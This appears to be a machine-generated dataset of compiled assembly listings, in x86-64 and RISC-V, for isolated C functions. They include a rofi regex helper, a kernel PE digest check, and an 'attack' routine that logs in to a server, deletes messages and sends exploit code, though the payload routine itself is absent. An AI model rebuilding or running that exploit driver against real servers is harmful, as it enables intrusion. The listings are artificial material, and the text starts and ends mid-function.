.cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L13: .cfi_restore_state movl (%rax), %edx movq %rbp, %rsi leaq .LC1(%rip), %rdi call g_strdup_printf@PLT movl FALSE(%rip), %esi movq %rax, %rbp movq %rax, %rdi call rofi_view_error_dialog@PLT movq %rbp, %rdi call g_free@PLT movq 16(%rsp), %rdi call g_error_free@PLT movq %r12, %rdi xorl %r12d, %r12d call g_free@PLT jmp .L1 .p2align 4,,10 .p2align 3 .L12: pushq %r13 .cfi_def_cfa_offset 88 movl helper_eval_cb2(%rip), %r9d movl $-1, %edx xorl %ecx, %ecx pushq %rbx .cfi_def_cfa_offset 96 xorl %r8d, %r8d movq %rbp, %rsi movq %rax, 24(%rsp) call g_regex_replace_eval@PLT movq %rax, %r12 popq %rax .cfi_def_cfa_offset 88 popq %rdx .cfi_def_cfa_offset 80 movq 8(%rsp), %rdi jmp .L2 .L14: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size helper_string_replace_if_exists_v, .-helper_string_replace_if_exists_v .globl helper_eval_cb2 .bss .align 4 .type helper_eval_cb2, @object .size helper_eval_cb2, 4 helper_eval_cb2: .zero 4 .globl FALSE .align 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .globl g_aug_volatile_4333 .align 4 .type g_aug_volatile_4333, @object .size g_aug_volatile_4333, 4 g_aug_volatile_4333: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_helper.c_helper_string_replace_if_exists_v_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\\[(.*)({[-\\w]+})(.*)\\]|({[\\w-]+})" .align 3 .LC1: .string "Failed to parse: '%s'\nError: '%s'" .text .align 1 .globl helper_string_replace_if_exists_v .type helper_string_replace_if_exists_v, @function helper_string_replace_if_exists_v: addi sp,sp,-80 sd s3,40(sp) sd s5,24(sp) la s3,__stack_chk_guard mv s5,sp sd s1,56(sp) sd s2,48(sp) ld a5, 0(s3) sd a5, 8(sp) li a5, 0 mv s1,a0 mv s2,a1 mv a3,s5 li a2,0 li a1,0 lla a0,.LC0 sd s0,64(sp) sd s4,32(sp) sd ra,72(sp) sd zero,0(sp) call g_regex_new@plt ld a5,0(sp) mv s0,a0 li s4,0 beq a5,zero,.L12 .L2: mv a0,s0 call g_regex_unref@plt ld a5,0(sp) bne a5,zero,.L13 .L1: ld a4, 8(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L14 ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) ld s5,24(sp) mv a0,s4 ld s4,32(sp) addi sp,sp,80 jr ra .L13: lw a2,0(a5) mv a1,s1 lla a0,.LC1 call g_strdup_printf@plt lw a1,.LANCHOR0+4 mv s0,a0 call rofi_view_error_dialog@plt mv a0,s0 call g_free@plt ld a0,0(sp) call g_error_free@plt mv a0,s4 call g_free@plt li s4,0 j .L1 .L12: mv a7,s5 mv a6,s2 lw a5,.LANCHOR0 li a4,0 li a3,0 li a2,-1 mv a1,s1 call g_regex_replace_eval@plt mv s4,a0 j .L2 .L14: call __stack_chk_fail@plt .size helper_string_replace_if_exists_v, .-helper_string_replace_if_exists_v .globl helper_eval_cb2 .globl FALSE .globl g_aug_volatile_4333 .bss .align 2 .set .LANCHOR0,. + 0 .type helper_eval_cb2, @object .size helper_eval_cb2, 4 helper_eval_cb2: .zero 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .type g_aug_volatile_4333, @object .size g_aug_volatile_4333, 4 g_aug_volatile_4333: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_verify_pefile.c_pefile_digest_pe_aug_v3_7
.file "extr_verify_pefile.c_pefile_digest_pe_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string ",%s" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "Digest size mismatch (%zx != %x)\n" .section .rodata.str1.1 .LC2: .string "Digest: desc=%zu size=%zu\n" .LC3: .string "Digest calc = [%*ph]\n" .LC4: .string "Digest mismatch\n" .LC5: .string "The digests match!\n" .LC6: .string " = %d" .text .p2align 4 .type pefile_digest_pe, @function pefile_digest_pe: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movl %esi, %r15d pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 movq %rdi, %r14 leaq .LC0(%rip), %rdi pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rdx, %rbx subq $24, %rsp .cfi_def_cfa_offset 80 movl 12(%rdx), %esi call kenter@PLT movl 12(%rbx), %edi xorl %edx, %edx xorl %esi, %esi call crypto_alloc_shash@PLT movq %rax, %rdi movq %rax, %rbp call IS_ERR@PLT movq %rbp, %rdi testq %rax, %rax jne .L12 call crypto_shash_descsize@PLT movq %rbp, %rdi movslq %eax, %r13 call crypto_shash_digestsize@PLT movq (%rbx), %r12 movq %rax, %rsi cmpq %rax, %r12 je .L5 movq %r12, %rdx leaq .LC1(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EBADMSG(%rip), %r12d negl %r12d .L6: movq %rbp, %rdi call crypto_free_shash@PLT movl %r12d, %esi leaq .LC6(%rip), %rdi call kleave@PLT .L1: addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movl %r12d, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L5: .cfi_restore_state addq $8, %r13 leaq .LC2(%rip), %rdi xorl %eax, %eax movq %r12, %rdx movq %r13, %rsi call pr_debug@PLT movl ENOMEM(%rip), %eax movl GFP_KERNEL(%rip), %esi leaq 0(%r13,%r12), %rdi movl %eax, 8(%rsp) call kzalloc@PLT testq %rax, %rax je .L13 movq %rbp, (%rax) movq %rax, %rdi movq %rax, 8(%rsp) call crypto_shash_init@PLT movq 8(%rsp), %r8 testl %eax, %eax movl %eax, %r12d js .L8 movq %r8, %rcx movq %rbx, %rdx movl %r15d, %esi movq %r14, %rdi call pefile_digest_pe_contents@PLT movq 8(%rsp), %r8 testl %eax, %eax movl %eax, %r12d js .L8 addq %r8, %r13 movq %r8, %rdi movq %r13, %rsi call crypto_shash_final@PLT movq 8(%rsp), %r8 testl %eax, %eax movl %eax, %r12d js .L8 movq (%rbx), %rsi movq %r13, %rdx leaq .LC3(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl 8(%rbx), %esi movq (%rbx), %rdx movq %r13, %rdi call memcmp@PLT movq 8(%rsp), %r8 testq %rax, %rax je .L9 leaq .LC4(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EKEYREJECTED(%rip), %r12d movq 8(%rsp), %r8 negl %r12d .p2align 4,,10 .p2align 3 .L8: movq %r8, %rdi call kzfree@PLT jmp .L6 .p2align 4,,10 .p2align 3 .L12: call PTR_ERR@PLT addl ENOENT(%rip), %eax jne .L3 movl ENOPKG(%rip), %r12d negl %r12d jmp .L1 .p2align 4,,10 .p2align 3 .L3: addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movq %rbp, %rdi popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 jmp PTR_ERR@PLT .p2align 4,,10 .p2align 3 .L13: .cfi_restore_state movl 8(%rsp), %r12d negl %r12d jmp .L6 .p2align 4,,10 .p2align 3 .L9: leaq .LC5(%rip), %rdi xorl %eax, %eax movq %r8, 8(%rsp) call pr_debug@PLT movq 8(%rsp), %r8 jmp .L8 .cfi_endproc .LFE1: .size pefile_digest_pe, .-pefile_digest_pe .globl GFP_KERNEL .bss .align 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .globl ENOPKG .align 4 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .globl ENOMEM .align 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .globl ENOENT .align 4 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .globl EKEYREJECTED .align 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .globl EBADMSG .align 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_verify_pefile.c_pefile_digest_pe_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string ",%s" .align 3 .LC1: .string "Digest size mismatch (%zx != %x)\n" .align 3 .LC2: .string "Digest: desc=%zu size=%zu\n" .align 3 .LC3: .string "Digest calc = [%*ph]\n" .align 3 .LC4: .string "Digest mismatch\n" .align 3 .LC5: .string "The digests match!\n" .align 3 .LC6: .string " = %d" .text .align 1 .type pefile_digest_pe, @function pefile_digest_pe: addi sp,sp,-80 sd s5,24(sp) mv s5,a1 lw a1,12(a2) sd s4,32(sp) mv s4,a0 lla a0,.LC0 sd ra,72(sp) sd s0,64(sp) sd s1,56(sp) mv s0,a2 sd s2,48(sp) sd s3,40(sp) sd s6,16(sp) sd s7,8(sp) call kenter@plt lw a0,12(s0) li a2,0 li a1,0 call crypto_alloc_shash@plt mv s1,a0 call IS_ERR@plt bne a0,zero,.L12 mv a0,s1 call crypto_shash_descsize@plt mv s3,a0 mv a0,s1 call crypto_shash_digestsize@plt ld s2,0(s0) mv a1,a0 beq s2,a0,.L5 mv a2,s2 lla a0,.LC1 call pr_debug@plt lw s2,.LANCHOR0+8 negw s2,s2 .L6: mv a0,s1 call crypto_free_shash@plt mv a1,s2 lla a0,.LC6 call kleave@plt .L4: ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s3,40(sp) ld s4,32(sp) ld s5,24(sp) ld s6,16(sp) ld s7,8(sp) mv a0,s2 ld s2,48(sp) addi sp,sp,80 jr ra .L5: addi s3,s3,8 mv a2,s2 mv a1,s3 lla a0,.LC2 call pr_debug@plt lla s6,.LANCHOR0 lw a1,16(s6) add a0,s3,s2 lw s2,12(s6) call kzalloc@plt mv s7,a0 negw s2,s2 beq a0,zero,.L6 sd s1,0(a0) call crypto_shash_init@plt mv s2,a0 blt a0,zero,.L8 mv a3,s7 mv a2,s0 mv a1,s5 mv a0,s4 call pefile_digest_pe_contents@plt mv s2,a0 blt a0,zero,.L8 add s3,s7,s3 mv a1,s3 mv a0,s7 call crypto_shash_final@plt mv s2,a0 blt a0,zero,.L8 ld a1,0(s0) mv a2,s3 lla a0,.LC3 call pr_debug@plt ld a2,0(s0) lw a1,8(s0) mv a0,s3 call memcmp@plt beq a0,zero,.L9 lla a0,.LC4 call pr_debug@plt lw s2,20(s6) negw s2,s2 .L8: mv a0,s7 call kzfree@plt j .L6 .L12: mv a0,s1 call PTR_ERR@plt lla a4,.LANCHOR0 lw a5,0(a4) negw a5,a5 bne a5,a0,.L3 lw s2,4(a4) negw s2,s2 j .L4 .L3: ld s0,64(sp) ld ra,72(sp) ld s2,48(sp) ld s3,40(sp) ld s4,32(sp) ld s5,24(sp) ld s6,16(sp) ld s7,8(sp) mv a0,s1 ld s1,56(sp) addi sp,sp,80 tail PTR_ERR@plt .L9: lla a0,.LC5 call pr_debug@plt j .L8 .size pefile_digest_pe, .-pefile_digest_pe .globl GFP_KERNEL .globl ENOPKG .globl ENOMEM .globl ENOENT .globl EKEYREJECTED .globl EBADMSG .bss .align 2 .set .LANCHOR0,. + 0 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_372.c_attack_aug_v3_3
.file "extr_372.c_attack_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "<<< %s\n" .LC1: .string "%d" .LC2: .string "[*] login failed\n" .LC3: .string "[*] sending exploit code ...\n" .LC4: .string "00000" .LC5: .string "[*] done" .text .p2align 4 .globl attack .type attack, @function attack: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pxor %xmm0, %xmm0 leaq .LC1(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movl $128, %r13d pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movl %edi, %r12d pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 leal 1(%r12), %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $2136, %rsp .cfi_def_cfa_offset 2192 movq %rsi, 16(%rsp) leaq 56(%rsp), %rbx leaq 80(%rsp), %rdi movq %rdx, 24(%rsp) leaq 64(%rsp), %r14 movl %ecx, 44(%rsp) movl $254, %ecx movq %r8, 32(%rsp) movq %fs:40, %rax movq %rax, 2120(%rsp) xorl %eax, %eax movaps %xmm0, 64(%rsp) rep stosq movq %rbx, %rdi call FD_ZERO@PLT movq %rbx, %rsi movl %r12d, %edi call FD_SET@PLT leaq 60(%rsp), %rax movq %rax, 8(%rsp) .p2align 4,,10 .p2align 3 .L3: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L3 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L3 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi subl $129, %r13d call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT cmpl $5, %r13d ja .L5 leaq .L7(%rip), %rdx movslq (%rdx,%r13,4), %rax addq %rdx, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L7: .long .L12-.L7 .long .L11-.L7 .long .L10-.L7 .long .L31-.L7 .long .L8-.L7 .long .L6-.L7 .text .L5: movq 16(%rsp), %rsi movl %r12d, %edi call sendlogin@PLT movl 40(%rsp), %r10d testl %r10d, %r10d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L14 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L14 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L12: movq 24(%rsp), %rsi movl %r12d, %edi call sendpassword@PLT movl 40(%rsp), %r9d testl %r9d, %r9d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L39 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L39 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L6: movl %r12d, %edi call delmessage@PLT movl 40(%rsp), %r8d testl %r8d, %r8d jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L37 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L37 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L8: movl %r12d, %edi call purgemessage@PLT movl 40(%rsp), %edi testl %edi, %edi jle .L18 .L99: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jg .L97 .L33: movl $130, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L92: movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L27 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L31: cmpl $200, 60(%rsp) je .L105 .L101: movl 40(%rsp), %edx testl %edx, %edx jle .L18 .L98: xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jg .L92 .L27: movl $132, %r13d jmp .L3 .L108: movl stderr(%rip), %edi leaq .LC3(%rip), %rsi call fprintf@PLT movq 16(%rsp), %rsi movq 32(%rsp), %rcx movl %r12d, %edi movl 44(%rsp), %edx call sendexploit@PLT movl 40(%rsp), %esi testl %esi, %esi jle .L18 xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %ebp, %edi call select@PLT testl %eax, %eax jle .L30 movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L30 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L10: movl $5, %edi call sleep@PLT movl %r12d, %edi call readmessage@PLT movl 40(%rsp), %ecx testl %ecx, %ecx jg .L98 .L18: movq 2120(%rsp), %rax subq %fs:40, %rax jne .L106 addq $2136, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L97: .cfi_restore_state movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L33 movl $2048, %edx xorl %esi, %esi movq %r14, %rdi call memset@PLT movl $2048, %edx movq %r14, %rsi movl %r12d, %edi call read@PLT movq %r14, %rsi leaq .LC0(%rip), %rdi movl %eax, 40(%rsp) xorl %eax, %eax call printf@PLT movq 8(%rsp), %rdx movq %r15, %rsi movq %r14, %rdi call sscanf@PLT .p2align 4,,10 .p2align 3 .L11: movl 60(%rsp), %eax cmpl $500, %eax jg .L107 cmpl $230, %eax je .L108 movl 40(%rsp), %eax testl %eax, %eax jg .L99 jmp .L18 .p2align 4,,10 .p2align 3 .L37: movl $133, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L39: movl $134, %r13d jmp .L3 .p2align 4,,10 .p2align 3 .L14: movl $129, %r13d jmp .L3 .L105: leaq .LC4(%rip), %rsi movq %r14, %rdi call strstr@PLT testl %eax, %eax je .L101 movq 32(%rsp), %rsi movq %r14, %rdi call strstr@PLT testl %eax, %eax je .L101 leaq .LC5(%rip), %rdi call puts@PLT jmp .L101 .L30: movl $131, %r13d jmp .L3 .L107: movl stderr(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT jmp .L18 .L106: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size attack, .-attack .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_372.c_attack_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "<<< %s\n" .align 3 .LC1: .string "%d" .align 3 .LC2: .string "[*] login failed\n" .align 3 .LC3: .string "[*] sending exploit code ...\n" .align 3 .LC4: .string "00000" .align 3 .LC5: .string "[*] done" .text .align 1 .globl attack .type attack, @function attack: addi sp,sp,-176 sd ra,168(sp) sd s0,160(sp) sd s1,152(sp) sd s2,144(sp) sd s3,136(sp) sd s4,128(sp) sd s5,120(sp) sd s6,112(sp) sd s7,104(sp) sd s8,96(sp) sd s9,88(sp) sd s10,80(sp) sd s11,72(sp) li s1,4096 addi sp,sp,-2032 li s0,-4096 addi a5,s1,-2032 sd a3,16(sp) sd a4,8(sp) addi a3,s1,-2040 addi a4,sp,32 add a3,a3,a4 mv s3,a0 add a5,a5,s0 addi a0,sp,32 la s11,__stack_chk_guard ld a4, 0(s11) sd a4, 0(a3) li a4, 0 add a5,a5,a0 mv s9,a1 mv s10,a2 li a1,0 li a2,2040 addi a0,sp,48 sd zero,2040(a5) call memset@plt addi s0,s0,2032 addi a5,s1,-2032 add a5,a5,s0 addi a4,sp,32 add s0,a5,a4 mv a0,s0 call FD_ZERO@plt mv a1,s0 mv a0,s3 mv s5,s1 call FD_SET@plt li s8,-4096 addi s4,s8,2040 addi a4,s5,-2032 addi a3,sp,32 add a4,a4,s4 addi a5,s5,-2032 addi s7,s8,2036 li s6,4096 add s4,a4,a3 add a5,a5,a3 addi a4,s5,-2032 add a4,a4,s7 sub a5,a5,s6 addiw s2,s3,1 li s1,128 add s7,a4,a3 sd a5,24(sp) .L3: li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L3 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L3 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt addiw s1,s1,-129 sext.w a4,s1 li a5,5 bgtu a4,a5,.L5 slli a5,s1,32 lla a4,.L7 srli s1,a5,30 add s1,s1,a4 lw a5,0(s1) add a5,a5,a4 jr a5 .section .rodata .align 2 .align 2 .L7: .word .L12-.L7 .word .L11-.L7 .word .L10-.L7 .word .L9-.L7 .word .L8-.L7 .word .L6-.L7 .text .L5: mv a1,s9 mv a0,s3 call sendlogin@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L14 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L14 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L12: mv a1,s10 mv a0,s3 call sendpassword@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L39 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L39 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L6: mv a0,s3 call delmessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L37 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L37 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L8: mv a0,s3 call purgemessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt bgt a0,zero,.L89 .L33: li s1,130 j .L3 .L91: lla a1,.LC3 lw a0,.LANCHOR0 call fprintf@plt ld a3,8(sp) ld a2,16(sp) mv a1,s9 mv a0,s3 call sendexploit@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L30 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L30 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L10: li a0,5 call sleep@plt mv a0,s3 call readmessage@plt ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt bgt a0,zero,.L90 .L27: li s1,132 j .L3 .L89: mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L33 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L11: li a5,4096 addi a5,a5,-2032 addi a4,sp,32 add a5,a5,s8 add a5,a5,a4 lw a5,2036(a5) li a4,500 bgt a5,a4,.L34 li s1,230 .L35: beq a5,s1,.L91 ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv a1,s0 mv a0,s2 call select@plt ble a0,zero,.L33 mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L33 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt ld a5,24(sp) li a4,500 lw a5,2036(a5) ble a5,a4,.L35 .L34: lla a1,.LC2 lw a0,.LANCHOR0 call fprintf@plt .L18: li a5,4096 addi a4,sp,32 addi a5,a5,-2040 add a5,a5,a4 ld a4, 0(a5) ld a5, 0(s11) xor a5, a4, a5 li a4, 0 bne a5,zero,.L92 addi sp,sp,2032 ld ra,168(sp) ld s0,160(sp) ld s1,152(sp) ld s2,144(sp) ld s3,136(sp) ld s4,128(sp) ld s5,120(sp) ld s6,112(sp) ld s7,104(sp) ld s8,96(sp) ld s9,88(sp) ld s10,80(sp) ld s11,72(sp) li a0,0 addi sp,sp,176 jr ra .L90: mv a1,s0 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L27 addi a2,s6,-2048 li a1,0 mv a0,s4 call memset@plt addi a2,s6,-2048 mv a1,s4 mv a0,s3 call read@plt mv a1,s4 mv s5,a0 lla a0,.LC0 call printf@plt mv a2,s7 lla a1,.LC1 mv a0,s4 call sscanf@plt .L9: li a5,4096 addi a5,a5,-2032 add a5,a5,s8 addi a4,sp,32 add s1,a5,a4 .L31: lw a4,2036(s1) li a5,200 beq a4,a5,.L93 .L85: ble s5,zero,.L18 li a4,0 li a3,0 li a2,0 mv 